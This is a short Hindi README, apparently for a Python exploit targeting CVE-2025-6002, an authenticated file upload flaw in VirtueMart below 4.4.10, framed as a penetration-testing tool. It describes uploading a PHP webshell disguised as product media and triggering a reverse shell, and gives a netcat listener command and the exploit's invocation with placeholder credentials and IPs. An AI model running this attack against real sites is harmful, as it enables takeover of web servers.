
CVE-2025-6002 के लिए पायथन एक्सप्लॉइट जो VirtueMart < 4.4.10 में प्रमाणित मनमाना फ़ाइल अपलोड को लक्षित करता है। लॉग इन करता है, एक PHP वेबशेल अपलोड करता है, और पेनिट्रेशन परीक्षण के लिए रिवर्स शेल ट्रिगर करता है।
यह स्क्रिप्ट VirtueMart < 4.4.10 (CVE-2025-6002) में प्रमाणित मनमानी फ़ाइल अपलोड भेद्यता का शोषण करती है, जिसका वर्णन इस ब्लॉग पोस्ट में किया गया है: https://blog.blacklanternsecurity.com/p/doomla-zero-days
यह स्क्रिप्ट दिए गए क्रेडेंशियल्स के साथ VirtueMart में लॉग इन करती है, एक नया उत्पाद बनाती है और एक PHP वेबशेल को मीडिया फ़ाइल के रूप में अपलोड करती है। फिर यह प्रदान किए गए IP/पोर्ट पर एक रिवर्स शेल को लागू करती है।
पैरामीटर:
उपयोग:
nc -nlvp 1337
python3 exploit.py --url http://x.x.x.x --username admin --password kartoffel --remote-ip x.x.x.x --remote-port 1337